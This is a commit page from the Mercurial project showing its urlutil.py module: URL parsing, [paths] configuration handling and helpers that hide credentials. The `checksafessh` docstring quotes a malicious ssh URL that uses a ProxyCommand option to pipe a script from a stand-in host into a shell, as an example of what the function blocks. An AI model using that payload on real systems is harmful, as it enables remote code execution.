##// END OF EJS Templates
urlutil: remove usage of `ui.expandpath` in `get_pull_paths`...
marmoute -
r47724:afdd7c47 default
parent child Browse files
Show More
@@ -1,754 +1,762
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Resolve ``port`` to a numeric network port.

    Anything ``int()`` accepts is converted and returned directly.
    Otherwise the value is treated as a service name and resolved through
    ``socket.getservbyname()``; an unknown service raises ``error.Abort``.
    """
    try:
        number = int(port)
    except ValueError:
        # not a number: fall through to the service-name lookup below
        number = None
    if number is not None:
        return number

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        msg = _(b"no port number associated with service '%s'") % port
        raise error.Abort(msg)
51
51
52
52
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted when re-serializing user/passwd
    _safechars = b"!~*'()+"
    # characters left unquoted when re-serializing path/fragment
    _safepchars = b"/!~*'()+:\\"
    # matches a leading "<scheme>:" prefix
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        """Parse ``path`` into its URL components.

        ``parsequery`` and ``parsefragment`` control whether ``?query`` and
        ``#fragment`` are split off or left inside the path (see the class
        docstring). Raises ``error.Abort`` for a ``file://`` URL whose host
        is not one of localhost / 127.0.0.1 / [::1].
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                # keep the unsplit "host:port" around; localpath() uses it
                # to recognize a drive letter that was parsed as a host
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new ``url`` carrying the same components as this one."""
        # The constructor argument is a placeholder: every parsed attribute
        # is overwritten below.
        u = url(b'temporary useless value')
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # the port must be copied explicitly, otherwise the copy silently
        # loses it (the placeholder URL above has no port)
        u.port = self.port
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        """Return ``<url name: value, ...>`` listing every non-None part."""
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            # local paths (and bundle: paths) are emitted without quoting
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # bracketed (IPv6-style) hosts are emitted verbatim
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url_without_credentials, authdata)``.

        ``authdata`` is None when the URL has no user; otherwise it is the
        tuple ``(None, (url, host), user, passwd or b'')``.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily blank the credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Tell whether this URL is absolute (remote, drive, UNC or '/')."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the filesystem path for this URL.

        For ``file`` and ``bundle`` schemes the path is derived from the
        parsed components; for anything else the original, unparsed string
        is returned.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
396
396
397
397
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether parsing ``path`` as a url yields a non-empty scheme."""
    scheme = url(path).scheme
    return bool(scheme)  # cast to help pytype
401
401
402
402
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` starts with ``<letter>:`` (e.g. ``c:``).

    Empty or None input yields False.
    """
    if not path:
        return False
    letter, colon = path[0:1], path[1:2]
    return colon == b':' and letter.isalpha()
406
406
407
407
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path for ``path``.

    The value is parsed with query and fragment splitting disabled, so
    ``?`` and ``#`` stay part of the path.
    """
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
411
411
412
412
def checksafessh(path):
    # type: (bytes) -> None
    """Reject ssh urls whose host part would be read by ssh as an option (SEC)

    ssh parses its first argument as an option when it starts with a dash,
    e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. Such urls are
    refused outright rather than passed on.

    Raises an error.Abort when the url is unsafe.
    """
    # check the unquoted form so a percent-encoded dash is caught too
    unquoted = urlreq.unquote(path)
    if unquoted.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(unquoted),)
        )
429
429
430
430
def hidepassword(u):
    # type: (bytes) -> bytes
    '''return the url string with any password replaced by ``***``'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
438
438
439
439
def removeauth(u):
    # type: (bytes) -> bytes
    '''return the url string with user and password stripped'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
446
446
447
447
def get_push_paths(repo, ui, dests):
    """yields all the `path` selected as push destination by `dests`

    With explicit destinations, each one is resolved through `ui.getpath`.
    Without any, the `default-push` path is used, then `default`; if
    neither is configured an `error.ConfigError` is raised.
    """
    if dests:
        for dest in dests:
            yield ui.getpath(dest)
        return

    # no explicit destination: first configured fallback wins
    for name in (b'default-push', b'default'):
        if name in ui.paths:
            yield ui.paths[name]
            return

    raise error.ConfigError(
        _(b'default repository not configured!'),
        hint=_(b"see 'hg help config.paths'"),
    )
463
463
464
464
def get_pull_paths(repo, ui, sources, default_branches=()):
    """yields all the `(path, branch)` selected as pull source by `sources`

    When `sources` is empty, the `default` path is used. Each source is
    looked up in `ui.paths` first; otherwise it is treated as a raw
    location, and kept verbatim if it cannot be turned into a `path`.
    """
    for source in sources or [b'default']:
        if source in ui.paths:
            loc = ui.paths[source].rawloc
        else:
            # Try to resolve as a local path or URI.
            try:
                # we pass the ui instance as warnings might need to be issued
                loc = path(ui, None, rawloc=source).rawloc
            except ValueError:
                loc = source
        yield parseurl(loc, default_branches)
472
480
473
481
def get_unique_push_path(action, repo, ui, dest=None):
    """return a unique `path` or abort if multiple are found

    This is useful for commands and actions that do not support multiple
    destinations (yet).

    Note that for now, we cannot get multiple destinations, so this function
    is "trivial".

    The `action` parameter will be used for the error message.
    """
    requested = [] if dest is None else [dest]
    found = list(get_push_paths(repo, ui, requested))
    # invariant: get_push_paths currently yields exactly one path here
    assert len(found) == 1
    return found[0]
491
499
492
500
def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
    """return a unique `(path, branch)` or abort if multiple are found

    This is useful for commands and actions that do not support multiple
    sources (yet).

    Note that for now, we cannot get multiple sources, so this function is
    "trivial".

    The `action` parameter will be used for the error message.
    """
    name = b'default' if source is None else source
    expanded = ui.expandpath(name)
    return parseurl(expanded, default_branches)
507
515
508
516
def get_clone_path(ui, source, default_branches=()):
    """return the `(origsource, path, branch)` selected as clone source

    `origsource` is `source` as expanded by `ui.expandpath`; `path` and
    `branch` come from running `parseurl` on it.
    """
    origsource = ui.expandpath(source)
    clone_path, branch = parseurl(origsource, default_branches)
    return origsource, clone_path, branch
514
522
515
523
def parseurl(path, branches=None):
    '''split url#branch into (url, (branch, branches))

    A non-empty fragment is returned as the branch and removed from the
    url; otherwise branch is None. A falsy ``branches`` becomes ``[]``.
    '''
    parsed = url(path)
    branch = parsed.fragment or None
    if branch is not None:
        parsed.fragment = None
    return bytes(parsed), (branch, branches or [])
524
532
525
533
class paths(dict):
    """A mapping of path names to ``path`` objects.

    It is populated from the ``[paths]`` config section of the ui instance
    given to the constructor.
    """

    def __init__(self, ui):
        dict.__init__(self)

        for name, loc in ui.configitems(b'paths', ignoresub=True):
            # No location is the same as not existing.
            if loc:
                loc, sub_opts = ui.configsuboptions(b'paths', name)
                self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)

        # chain in name order once every entry has been registered
        for name in sorted(self):
            self[name].chain_path(ui, self)

    def getpath(self, ui, name, default=None):
        """Return a ``path`` from a string, falling back to default.

        ``name`` can be a named path or a location. Locations are filesystem
        paths or URIs.

        When ``name`` is None, the first registered entry among ``default``
        (a single key, or a tuple/list of keys) is returned, or None if
        there is none. An empty ``name`` returns None. A ``name`` that is
        neither registered nor usable as a location raises
        ``error.RepoError``.
        """
        if name is None:
            # Only fall back to default if no path was requested.
            if not default:
                candidates = ()
            elif isinstance(default, (tuple, list)):
                candidates = default
            else:
                candidates = (default,)
            for key in candidates:
                if key in self:
                    return self[key]
            return None

        # Most likely empty string.
        # This may need to raise in the future.
        if not name:
            return None

        if name in self:
            return self[name]

        # Try to resolve as a local path or URI.
        try:
            # we pass the ui instance as warnings might need to be issued
            return path(ui, None, rawloc=name)
        except ValueError:
            raise error.RepoError(_(b'repository %s does not exist') % name)
582
590
583
591
# Registry of the declared path sub-options. Maps a sub-option name to an
# ``(attr, func)`` pair; entries are added by the ``pathsuboption`` decorator.
_pathsuboptions = {}


def pathsuboption(option, attr):
    """Decorator used to declare a path sub-option.

    Arguments are the sub-option name and the attribute it should set on
    ``path`` instances.

    The decorated function will receive as arguments a ``ui`` instance,
    ``path`` instance, and the string value of this option from the config.
    The function should return the value that will be set on the ``path``
    instance.

    This decorator can be used to perform additional verification of
    sub-options and to change the type of sub-options.

    The decorated function is returned unchanged. Declaring the same
    ``option`` twice replaces the earlier registration.
    """

    def register(func):
        _pathsuboptions[option] = (attr, func)
        return func

    return register
607
615
608
616
@pathsuboption(b'pushurl', b'pushloc')
def pushurlpathoption(ui, path, value):
    """Validate the ``pushurl`` sub-option, stored as ``path.pushloc``.

    ``value`` must parse as a URL with a scheme; otherwise a warning is
    issued through ``ui`` and None is returned (the option is ignored).

    A ``#fragment`` is not supported here: when one is present a warning is
    issued and the fragment is dropped. The resulting URL is returned as
    bytes.
    """
    u = url(value)
    # Actually require a URL.
    if not u.scheme:
        ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
        return None

    # Don't support the #foo syntax in the push URL to declare branch to
    # push.
    if u.fragment:
        ui.warn(
            _(
                b'("#fragment" in paths.%s:pushurl not supported; '
                b'ignoring)\n'
            )
            % path.name
        )
        u.fragment = None

    return bytes(u)
630
638
631
639
@pathsuboption(b'pushrev', b'pushrev')
def pushrevpathoption(ui, path, value):
    """Handle the ``pushrev`` sub-option, stored as ``path.pushrev``.

    The configured value is returned as is, without any validation.
    """
    return value
635
643
636
644
class path(object):
    """Represents an individual path and its configuration."""

    def __init__(self, ui, name, rawloc=None, suboptions=None):
        """Construct a path from its config options.

        ``ui`` is the ``ui`` instance the path is coming from.
        ``name`` is the symbolic name of the path.
        ``rawloc`` is the raw location, as defined in the config.
        ``suboptions`` is an optional dict of the sub-options defined for
        this path. They take precedence over the ones defined for ``*`` in
        the ``[paths]`` section.

        ``ValueError`` is raised if ``rawloc`` is empty.

        If ``name`` is not defined, we require that the location be a) a local
        filesystem path with a .hg directory or b) a URL. If not,
        ``ValueError`` is raised.
        """
        if not rawloc:
            raise ValueError(b'rawloc must be defined')

        # Locations may define branches via syntax <base>#<branch>.
        u = url(rawloc)
        branch = None
        if u.fragment:
            branch = u.fragment
            u.fragment = None

        self.url = u
        # the url from the config/command line before dealing with `path://`
        self.raw_url = u.copy()
        self.branch = branch

        self.name = name
        self.rawloc = rawloc
        self.loc = b'%s' % u

        self._validate_path()

        # sub-options set on `*` act as defaults for every path
        _path, sub_opts = ui.configsuboptions(b'paths', b'*')
        self._own_sub_opts = {}
        if suboptions is not None:
            self._own_sub_opts = suboptions.copy()
            sub_opts.update(suboptions)
        self._all_sub_opts = sub_opts.copy()

        self._apply_suboptions(ui, sub_opts)

    def chain_path(self, ui, paths):
        """Resolve a ``path://<name>`` location against ``paths``.

        Nothing happens unless the url scheme of this path is ``path``. In
        that case the url host is used as the name of another path, looked up
        in ``paths``, and this path takes over its ``url``, ``rawloc`` and
        ``loc``.

        If this path defines no branch, the branch of the other path is
        inherited. Otherwise this path keeps its own branch and ``rawloc`` is
        rewritten to carry it.

        Sub-options are recomputed from all the sub-options of the other path,
        overridden by the ones defined on this path.

        ``error.Abort`` is raised if the other path is unknown, or is itself
        defined as a ``path://`` location.
        """
        if self.url.scheme == b'path':
            assert self.url.path is None
            try:
                subpath = paths[self.url.host]
            except KeyError:
                m = _(b'cannot use `%s`, "%s" is not a known path')
                m %= (self.rawloc, self.url.host)
                raise error.Abort(m)
            # check the target as it was configured: only one level of
            # indirection is accepted
            if subpath.raw_url.scheme == b'path':
                m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
                m %= (self.rawloc, self.url.host)
                raise error.Abort(m)
            self.url = subpath.url
            self.rawloc = subpath.rawloc
            self.loc = subpath.loc
            if self.branch is None:
                self.branch = subpath.branch
            else:
                # replace the branch of the target (if any) by our own
                base = self.rawloc.rsplit(b'#', 1)[0]
                self.rawloc = b'%s#%s' % (base, self.branch)
            suboptions = subpath._all_sub_opts.copy()
            suboptions.update(self._own_sub_opts)
            self._apply_suboptions(ui, suboptions)

    def _validate_path(self):
        """Raise ``ValueError`` for an unnamed path with an invalid location.

        Only paths without a name are checked. Their location must either
        have a url scheme or satisfy ``_isvalidlocalpath``.
        """
        # When given a raw location but not a symbolic name, validate the
        # location is valid.
        if (
            not self.name
            and not self.url.scheme
            and not self._isvalidlocalpath(self.loc)
        ):
            raise ValueError(
                b'location is not a URL or path to a local '
                b'repo: %s' % self.rawloc
            )

    def _apply_suboptions(self, ui, sub_options):
        """Set the attribute of every registered sub-option on this path.

        ``sub_options`` maps sub-option names to their raw config value. The
        value returned by the function registered for a sub-option is stored
        in the associated attribute.
        """
        # Now process the sub-options. If a sub-option is registered, its
        # attribute will always be present. The value will be None if there
        # was no valid sub-option.
        for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
            if suboption not in sub_options:
                setattr(self, attr, None)
                continue

            value = func(ui, self, sub_options[suboption])
            setattr(self, attr, value)

    def _isvalidlocalpath(self, path):
        """Returns True if the given path is a potentially valid repository.
        This is its own function so that extensions can change the definition of
        'valid' in this case (like when pulling from a git repo into a hg
        one)."""
        try:
            return os.path.isdir(os.path.join(path, b'.hg'))
        # Python 2 may return TypeError. Python 3, ValueError.
        except (TypeError, ValueError):
            return False

    @property
    def suboptions(self):
        """Return sub-options and their values for this path.

        This is intended to be used for presentation purposes.

        Sub-options whose attribute is None are left out.
        """
        d = {}
        for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
            value = getattr(self, attr)
            if value is not None:
                d[subopt] = value
        return d
General Comments 0
You need to be logged in to leave comments. Login now